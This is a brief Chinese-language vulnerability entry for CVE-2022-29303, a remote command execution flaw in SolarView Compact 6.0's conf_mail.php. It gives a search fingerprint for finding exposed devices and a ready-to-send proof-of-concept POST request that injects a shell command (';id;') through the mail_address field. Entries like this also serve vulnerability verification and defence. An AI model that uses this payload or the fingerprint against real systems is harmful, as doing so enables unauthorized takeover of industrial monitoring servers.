# SolarView Compact conf_mail.php 远程命令执行漏洞 CVE-2022-29303

# 漏洞描述

SolarView Compact conf_mail.php 存在远程命令执行漏洞，攻击者通过构造特殊的请求，可以获取服务器权限

SolarView Compact 6.0

body="SolarView Compact" && title=="Top"

主页面

验证POC

POST /conf_mail.php
  
mail_address=%3Bid%3B&button=%83%81%81%5B%83%8B%91%97%90M

1
2
3